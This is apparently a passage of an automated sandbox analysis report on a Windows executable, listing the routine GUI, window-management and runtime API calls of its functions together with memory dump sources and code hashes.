                                                                                • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 004289FC
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00428A12
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428A2C
                                                                                • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00428A54
                                                                                • IsWindowEnabled.USER32(?), ref: 00428A5F
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00428A70
                                                                                • OffsetRect.USER32 ref: 00428AFC
                                                                                  • Part of subcall function 00426D60: SetBkColor.GDI32(?,00000000), ref: 00426E84
                                                                                • DrawTextA.USER32(?,?,?,?,00000020), ref: 00428B34
                                                                                • GetFocus.USER32 ref: 00428B40
                                                                                • InflateRect.USER32(?,00000001,00000001), ref: 00428B51
                                                                                • IntersectRect.USER32 ref: 00428B62
                                                                                • DrawFocusRect.USER32 ref: 00428B6E
                                                                                • SelectObject.GDI32(?,00000000), ref: 00428B81
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
                                                                                • String ID:
                                                                                • API String ID: 1611134597-0
                                                                                • Opcode ID: 03fa01c814b5d5bdf5949661c03ac3a7363c27539915638b09bb1072ab922299
                                                                                • Instruction ID: 93093aa1a0f2c78e55dc18f3bb0fd48f5b1bbe49ed81b85a626c0548aa9e7718
                                                                                • Opcode Fuzzy Hash: 03fa01c814b5d5bdf5949661c03ac3a7363c27539915638b09bb1072ab922299
                                                                                • Instruction Fuzzy Hash: A6B13671208201AFD304CF58DD85E6BB7E8FB88705F404A1DF599D7290DB75EA41CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ScreenToClient.USER32 ref: 004022E4
                                                                                • PtInRect.USER32(00000000,00000000,00000084), ref: 004022FE
                                                                                • CallWindowProcA.USER32 ref: 00402346
                                                                                • GetDC.USER32(0000000F), ref: 00402358
                                                                                • DrawFrameControl.USER32 ref: 00402370
                                                                                • ReleaseDC.USER32 ref: 00402381
                                                                                • CallWindowProcA.USER32 ref: 004023CC
                                                                                  • Part of subcall function 00401F18: BeginDeferWindowPos.USER32(00000000), ref: 00401F88
                                                                                  • Part of subcall function 00401F18: GetWindowRect.USER32 ref: 00401FC2
                                                                                  • Part of subcall function 00401F18: MapWindowPoints.USER32 ref: 00401FD7
                                                                                • InvalidateRect.USER32(00000005,00000000,00000001), ref: 00402418
                                                                                  • Part of subcall function 00402856: GetClientRect.USER32 ref: 00402868
                                                                                  • Part of subcall function 00402856: GetSystemMetrics.USER32 ref: 00402870
                                                                                  • Part of subcall function 00402856: GetSystemMetrics.USER32 ref: 00402885
                                                                                  • Part of subcall function 00402856: InvalidateRect.USER32(00000000,?,00000001,?,00401B44,FFFFFFB7,00000001), ref: 004028AC
                                                                                • CallWindowProcA.USER32 ref: 0040245F
                                                                                • GetCursorPos.USER32(00000000), ref: 00402542
                                                                                • GetWindowRect.USER32 ref: 0040256B
                                                                                • EqualRect.USER32 ref: 004025E9
                                                                                • SetWindowPos.USER32(00000200,00000000,?,?,?,?,00000014), ref: 00402620
                                                                                • GetCursorPos.USER32(?), ref: 00402646
                                                                                • GetWindowRect.USER32 ref: 00402657
                                                                                • SetCapture.USER32(000000A1), ref: 0040271E
                                                                                • ReleaseCapture.USER32 ref: 00402738
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Rect$CallProc$CaptureClientCursorInvalidateMetricsReleaseSystem$BeginControlDeferDrawEqualFramePointsScreen
                                                                                • String ID: $$:!@$:!@
                                                                                • API String ID: 330548355-551015223
                                                                                • Opcode ID: 8ae2271a3a4097cf723e239de0f2510a8592ef92536d4c84d7ccbf5cae9fe13a
                                                                                • Instruction ID: 32d28a0328c911aa789c3a8b61bcb6f17f3a48022283877fa74d473a050a59d9
                                                                                • Opcode Fuzzy Hash: 8ae2271a3a4097cf723e239de0f2510a8592ef92536d4c84d7ccbf5cae9fe13a
                                                                                • Instruction Fuzzy Hash: AF02A774A00209DFCB04CF98C994AEEBBB5FF48315F248269E905AB395C775E982CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 00429125
                                                                                • CallWindowProcA.USER32 ref: 0042914D
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID:
                                                                                • API String ID: 2276450057-0
                                                                                • Opcode ID: 669b97bf8b33443c3aa8efd9cba5932e0f436216a5dc825d0a20318bd30a7f03
                                                                                • Instruction ID: fd2f8a0f68b694065fac5a57c64d99df18ca824769472e37806bd5fbe8e54d78
                                                                                • Opcode Fuzzy Hash: 669b97bf8b33443c3aa8efd9cba5932e0f436216a5dc825d0a20318bd30a7f03
                                                                                • Instruction Fuzzy Hash: A4613B72744320BBE2209B55FC49FAF7758EB86772F50052AFD00973D1DA299D0182BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0043193C: TlsGetValue.KERNEL32(0044DC44,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000,?,0042A17C,00000000,00000000,00000000,00000000), ref: 0043197B
                                                                                • CallNextHookEx.USER32 ref: 0042B5BB
                                                                                • GetClassLongA.USER32(?,000000E6), ref: 0042B602
                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 0042B62E
                                                                                • lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_00030872), ref: 0042B63D
                                                                                • GetWindowLongA.USER32 ref: 0042B6B0
                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0042B6D1
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                                                                • String ID: AfxOldWndProc423$ime
                                                                                • API String ID: 3731301195-104836986
                                                                                • Opcode ID: 02dafad50929403a0e9e0b30e21fff90a4ed255024f12e0c70b5e73fa4258cac
                                                                                • Instruction ID: ddcc6b038d501befeebe275d504f36c0ca086ce6f4371d20e35bbca7eaf78405
                                                                                • Opcode Fuzzy Hash: 02dafad50929403a0e9e0b30e21fff90a4ed255024f12e0c70b5e73fa4258cac
                                                                                • Instruction Fuzzy Hash: B351A331600225AFCB119F65EC48B6B7BB8FF44355F508526F916AB291CB78DA40CBD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                • String ID: ($@
                                                                                • API String ID: 808654186-1311469180
                                                                                • Opcode ID: c732cfaa1f0a8cd1759c9fa9721c240d1752357aae8708fea36687dd9dbcd0bb
                                                                                • Instruction ID: c69e3e10dc8f0aa7acf604fe3ee190bed53639fffb1c83ac38c4b4b6df4aabeb
                                                                                • Opcode Fuzzy Hash: c732cfaa1f0a8cd1759c9fa9721c240d1752357aae8708fea36687dd9dbcd0bb
                                                                                • Instruction Fuzzy Hash: 77515471E00229ABDB10DFA8EC85EEEBBB9AF44314F554116F901F7290DA34ED06CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,?,73FD5D80,00421A50,?,?,?,?,?,?,?,0042D0C3,00000000,00000002,00000028), ref: 00421939
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00421951
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00421962
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00421973
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00421984
                                                                                • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00421995
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004219A6
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                • API String ID: 667068680-2376520503
                                                                                • Opcode ID: 50c626119172fd31b313bea65e3c89444c3e274db35bc2a29e343c46cc6c2576
                                                                                • Instruction ID: a85f0fd6c7e6c8be5f541268c400f8f269d0b15cfe923c488f4b61260bdda861
                                                                                • Opcode Fuzzy Hash: 50c626119172fd31b313bea65e3c89444c3e274db35bc2a29e343c46cc6c2576
                                                                                • Instruction Fuzzy Hash: DA1151B4F40224DAA321BF26ACD5A3ABAF0B61AB407A4093FE115D22A0C7785485CF1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044E660,73FD2D10,76D52E90,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427A47
                                                                                • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 00427A70
                                                                                • lstrcmpiA.KERNEL32(?,kanji,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427A82
                                                                                • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 00427AA5
                                                                                • lstrcmpiA.KERNEL32(?,hangeul,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427AB1
                                                                                • LeaveCriticalSection.KERNEL32(0044E660,?,?,?,?,?,?,?,?,?,?,?,?,00427047), ref: 00427AC3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
                                                                                • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
                                                                                • API String ID: 1105401458-111014456
                                                                                • Opcode ID: 04f458f2761271753607e0c3fa666cbcf156a6e141198ef81c26a9ff78827e52
                                                                                • Instruction ID: 52780afb9afab5b7d77386e9c09488af12e4d7a6f163db323987893dde90b72e
                                                                                • Opcode Fuzzy Hash: 04f458f2761271753607e0c3fa666cbcf156a6e141198ef81c26a9ff78827e52
                                                                                • Instruction Fuzzy Hash: 1701F73568430AB9F6109B64EC06FDB3F98DBD9B01F700036F60092192E7A8D60886EE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
                                                                                • String ID: edit
                                                                                • API String ID: 4088303749-2167791130
                                                                                • Opcode ID: 9344946788155270f6c6f623a1f3b4d8015b2ecad03aca42361679214239855b
                                                                                • Instruction ID: a0fca1982c1711c014e0ba9bd34a4dcc5d753ed13ef0219f952b0f76b307e544
                                                                                • Opcode Fuzzy Hash: 9344946788155270f6c6f623a1f3b4d8015b2ecad03aca42361679214239855b
                                                                                • Instruction Fuzzy Hash: 6921967A30153269A7516B39AC04FFB2AACAF69744B820575FD14C1120F728DA428B7D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 00429F14
                                                                                • GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 00429F20
                                                                                • EnterCriticalSection.KERNEL32(0044E660), ref: 00429F3C
                                                                                • GetVersion.KERNEL32 ref: 00429F4E
                                                                                • GetSystemMetrics.USER32 ref: 00429F92
                                                                                • GetSystemMetrics.USER32 ref: 00429F9C
                                                                                • GetSystemMetrics.USER32 ref: 00429FA6
                                                                                • GetSystemMetrics.USER32 ref: 00429FAF
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 00429FBB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
                                                                                • String ID: DisableThreadLibraryCalls$KERNEL32.DLL
                                                                                • API String ID: 1414939872-3863293605
                                                                                • Opcode ID: 662bee427edc3f34452231349272ca85c4d050feee4c676387a86ec6b22f0360
                                                                                • Instruction ID: 650d44db805d81423b400fa670bcbe809f28716c44ccb6f200b0172be402ee5f
                                                                                • Opcode Fuzzy Hash: 662bee427edc3f34452231349272ca85c4d050feee4c676387a86ec6b22f0360
                                                                                • Instruction Fuzzy Hash: 23117C74A50725EAEB50AF31ED0965B3EA0FB12702F91443AF945972A0D7799808CF8E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetParent.USER32(FFFFFDA7), ref: 004214F8
                                                                                • GetWindow.USER32(?,00000005), ref: 0042155F
                                                                                • GetWindow.USER32(?,00000002), ref: 00421570
                                                                                • IsWindow.USER32(?), ref: 00421583
                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00421597
                                                                                • lstrcmpiA.KERNEL32(?,ToolbarWindow32), ref: 004215A6
                                                                                  • Part of subcall function 00401643: _Smanip.LIBCPMTD ref: 00401690
                                                                                  • Part of subcall function 00401643: _Smanip.LIBCPMTD ref: 004016AA
                                                                                  • Part of subcall function 00401643: _Smanip.LIBCPMTD ref: 004016D8
                                                                                  • Part of subcall function 00401C16: GetDlgItem.USER32 ref: 00401C38
                                                                                  • Part of subcall function 004027B4: GetWindowRect.USER32 ref: 004027C8
                                                                                  • Part of subcall function 004027B4: _Smanip.LIBCPMTD ref: 004027DF
                                                                                • MoveWindow.USER32(?,00000000,00000000,00000000,00000000,00000001,00000001,00000002,00000064,00000064,00000000,00000000,00000001,00000064,00000064,00000000), ref: 004216F3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Smanip$ClassItemMoveNameParentRectlstrcmpi
                                                                                • String ID: N$N$C$ToolbarWindow32
                                                                                • API String ID: 1368478647-1726087458
                                                                                • Opcode ID: 8803b2e75d736782df9a6ab042f3a2b034ff12d42b343225a82b35c8a4189531
                                                                                • Instruction ID: 087d61ecbdf7d91e9e1061ab5d20a948f0193d1da4d5f2b7d88476c8263a4c1a
                                                                                • Opcode Fuzzy Hash: 8803b2e75d736782df9a6ab042f3a2b034ff12d42b343225a82b35c8a4189531
                                                                                • Instruction Fuzzy Hash: 58810B70B80315ABEB24DF94CD46FAEB7B5AB48704F204169F6057B2D1C7B9AD40CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0042A752
                                                                                • GetSystemMetrics.USER32 ref: 0042A804
                                                                                • GlobalLock.KERNEL32 ref: 0042A88E
                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,0042A595,00000000), ref: 0042A8C0
                                                                                  • Part of subcall function 0042EA11: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042EA25
                                                                                • DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0042A937
                                                                                • GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0042A948
                                                                                • GlobalFree.KERNEL32 ref: 0042A951
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
                                                                                • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                                                                • API String ID: 2343056566-2894235370
                                                                                • Opcode ID: e29a325b15985961ae5d1a6553ec1f891997f50d40e93e755d5080d86f0b4f75
                                                                                • Instruction ID: 2770577b83cc1c954c61eca1fee551e966a6576e53e849b91b116d6b17df0bd8
                                                                                • Opcode Fuzzy Hash: e29a325b15985961ae5d1a6553ec1f891997f50d40e93e755d5080d86f0b4f75
                                                                                • Instruction Fuzzy Hash: 0A61B571A0021ADFCF14EF95E9459EEBBB1FF04304F50442FF901A2291DB788A51CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004282A7
                                                                                • EnterCriticalSection.KERNEL32(0044E660), ref: 004282B4
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 004282FC
                                                                                • CallNextHookEx.USER32 ref: 00428313
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 0042832E
                                                                                • GetWindowLongA.USER32 ref: 00428372
                                                                                • SendMessageA.USER32 ref: 00428399
                                                                                • GetParent.USER32(?), ref: 00428401
                                                                                • CallNextHookEx.USER32 ref: 0042843E
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
                                                                                • String ID: D
                                                                                • API String ID: 1151315845-193714618
                                                                                • Opcode ID: d184fad9f60f6af29302dbd4668d7c930e313be64ce23e937a0726a6fbe5983a
                                                                                • Instruction ID: 63be24607ec99edc481cb90af060114fbf7ded4d5f6f736c22a7f660fe76b1ae
                                                                                • Opcode Fuzzy Hash: d184fad9f60f6af29302dbd4668d7c930e313be64ce23e937a0726a6fbe5983a
                                                                                • Instruction Fuzzy Hash: AA41CC71A052259BE710EF21FC49A2F73A8FB65715F84403EF90192251EB79E908CB6E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 004298C4
                                                                                • CallWindowProcA.USER32 ref: 004298E9
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID:
                                                                                • API String ID: 2276450057-0
                                                                                • Opcode ID: 4ddc7f21561b2aa00eaee5d9b4422749ecd863d78ff08ae6a9030780929e0961
                                                                                • Instruction ID: bfd8e66c31ac7e4bfb8ab2edef9ac1fa8bd8270a8bb0c000e7ae4ac2eee0e6ef
                                                                                • Opcode Fuzzy Hash: 4ddc7f21561b2aa00eaee5d9b4422749ecd863d78ff08ae6a9030780929e0961
                                                                                • Instruction Fuzzy Hash: C651BFB6A00220BFD210DB45EC84D7BB7B8EBC9721F84452EF95583300E7399C8587A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
                                                                                • String ID:
                                                                                • API String ID: 3606012576-0
                                                                                • Opcode ID: 42cded252f3ae2dfd680362d6e69f017d48515f24c1649d2a5cbf5e630380823
                                                                                • Instruction ID: 21a4dd910e7e8fdce9542383382d5eca9d1c13b710525b8bd0915806ce359b0a
                                                                                • Opcode Fuzzy Hash: 42cded252f3ae2dfd680362d6e69f017d48515f24c1649d2a5cbf5e630380823
                                                                                • Instruction Fuzzy Hash: 534127723043057BD210AB54BC46F7F73ACEB85B25FC4052EFB0196182DB69DA0587BA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 0042739D
                                                                                • RemovePropA.USER32 ref: 004273D3
                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004273D9
                                                                                • RemovePropA.USER32 ref: 00427407
                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0042740D
                                                                                • GetWindow.USER32(?,00000005), ref: 00427462
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00427473
                                                                                Similarity
                                                                                • API ID: Window$Long$PropRemove
                                                                                • String ID:
                                                                                • API String ID: 3256693057-0
                                                                                • Opcode ID: 04f2fe13007905304d3eec2a85775694bc2d561c817aedb675e05a16a13245b6
                                                                                • Instruction ID: 5fd58ad0cea725002760742ac6ec83ef97c00a649ea109c367f7e5d8bda159df
                                                                                • Opcode Fuzzy Hash: 04f2fe13007905304d3eec2a85775694bc2d561c817aedb675e05a16a13245b6
                                                                                • Instruction Fuzzy Hash: A321372A3194326AD701B735BC40EBF269CEF56765B928136FD00D2251FB289D03877D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 004247BA
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 004247CE
                                                                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 004247FA
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00422CE5), ref: 00424832
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00422CE5), ref: 00424854
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00422CE5), ref: 0042486D
                                                                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00422CE5), ref: 00424880
                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004248BE
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                • String ID: ,B
                                                                                • API String ID: 1823725401-1171447694
                                                                                • Opcode ID: 6e4eebe2f7c47ce69445b25f43a672477e1096752b97ff190f9b27dd38fd8741
                                                                                • Instruction ID: a81a85fb3038a6f2187c3c4b04738b970651fe17f32754a691e671f08d602ce9
                                                                                • Instruction Fuzzy Hash: 7631247A7242B16E97207FB5BC8483BB6DCEAC63597910A3BF541C3200E7698C40836D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0042B3BB
                                                                                • GetPropA.USER32 ref: 0042B3D3
                                                                                • CallWindowProcA.USER32 ref: 0042B431
                                                                                  • Part of subcall function 0042AFC3: GetWindowRect.USER32 ref: 0042AFE8
                                                                                  • Part of subcall function 0042AFC3: GetWindow.USER32(?,00000004), ref: 0042B005
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 0042B461
                                                                                • RemovePropA.USER32 ref: 0042B469
                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 0042B470
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 0042B477
                                                                                  • Part of subcall function 0042AFA0: GetWindowRect.USER32 ref: 0042AFAC
                                                                                • CallWindowProcA.USER32 ref: 0042B4CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                                • String ID: AfxOldWndProc423
                                                                                • API String ID: 2397448395-1060338832
                                                                                • Opcode ID: 35c4507c63b337afb33a6d21b3cd3780cf2fbc0926c33888a38aa1cdaac37185
                                                                                • Instruction ID: 4c58fedbf9d347d8884a3c2b1c7baa330e1f0c086a5c98df8aed871d427c8c8e
                                                                                • Instruction Fuzzy Hash: A131A372A0022ABFCF01AFA5ED49EFF7B78EF05311F40411AFA11A1151C7789A10DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowRect.USER32 ref: 00401A02
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00401A1E
                                                                                • RemovePropA.USER32 ref: 00401A3A
                                                                                  • Part of subcall function 00402164: GetMenu.USER32 ref: 0040217C
                                                                                  • Part of subcall function 00402164: GetWindowLongA.USER32 ref: 00402194
                                                                                  • Part of subcall function 00402164: GetWindowRect.USER32 ref: 004021A8
                                                                                  • Part of subcall function 00402164: GetClientRect.USER32 ref: 004021B9
                                                                                  • Part of subcall function 00402164: AdjustWindowRect.USER32(?,?,?), ref: 004021E3
                                                                                  • Part of subcall function 00402164: AdjustWindowRect.USER32(?,?,?), ref: 00402214
                                                                                  • Part of subcall function 00402164: SetWindowLongA.USER32(00000000,000000F0,?), ref: 0040225F
                                                                                • GetClientRect.USER32 ref: 00401AC1
                                                                                • SetPropA.USER32(?,___CResizeCtrl___Class___,FFFFFFFF), ref: 00401AF3
                                                                                • GetWindowLongA.USER32 ref: 00401B02
                                                                                • SetWindowLongA.USER32(?,000000FC,004020F4), ref: 00401B1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$AdjustClientProp$MenuRemove
                                                                                • String ID: ___CResizeCtrl___Class___
                                                                                • API String ID: 198977373-3260620844
                                                                                • Opcode ID: 6d6511b40c8d61ab5bc81dff66939c815597cb77b0480e161fa684ed8bba3e8e
                                                                                • Instruction ID: 645f68958a581d9b3716c3ba2d15efc11347372831ef04691f65374df07c59ab
                                                                                • Instruction Fuzzy Hash: 1C51DBB4A0020A9FCB04DF94D495AAFBB75FB48315F108159EA05AB391C775E981CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetStockObject.GDI32(00000011), ref: 0042EE7C
                                                                                • GetStockObject.GDI32(0000000D), ref: 0042EE84
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 0042EE91
                                                                                • GetDC.USER32(00000000), ref: 0042EEA0
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042EEB7
                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 0042EEC3
                                                                                • ReleaseDC.USER32 ref: 0042EECE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Object$Stock$CapsDeviceRelease
                                                                                • String ID: System
                                                                                • API String ID: 46613423-3470857405
                                                                                • Opcode ID: 5ec92b23d7e8824ca08d5c5c64e44d6b9b9ba79e416efc9519c9b9b384639936
                                                                                • Instruction ID: d9e214c30308987c0adf06eeff37de45036da8bccfb3ee18a6df39442fe8ee78
                                                                                • Instruction Fuzzy Hash: A8118231B00218FBEB109FA1DC45FAE7BB8AF14742F40402AFA05E62D0D774DE418BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,0042D7AB,00000000,00020000,?,?,00000000), ref: 0042D4BA
                                                                                • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D4C3
                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0042D4D7
                                                                                • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D4F2
                                                                                • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D50E
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D51A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                • API String ID: 1437655972-4218389149
                                                                                • Opcode ID: 4c57caacd1a4191dcef1f12d45bfe221b58bb887195d4d1828467920169ed80c
                                                                                • Instruction ID: 2619aa1cd02ed1f15d6533cdaee9f3b74daa88b6a71469bc9246842ef1531e9e
                                                                                • Instruction Fuzzy Hash: B1F0C836B00222AB9B11AF64FD4891B73ACAF8875B7094436F911E3310CB68DD458B7E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
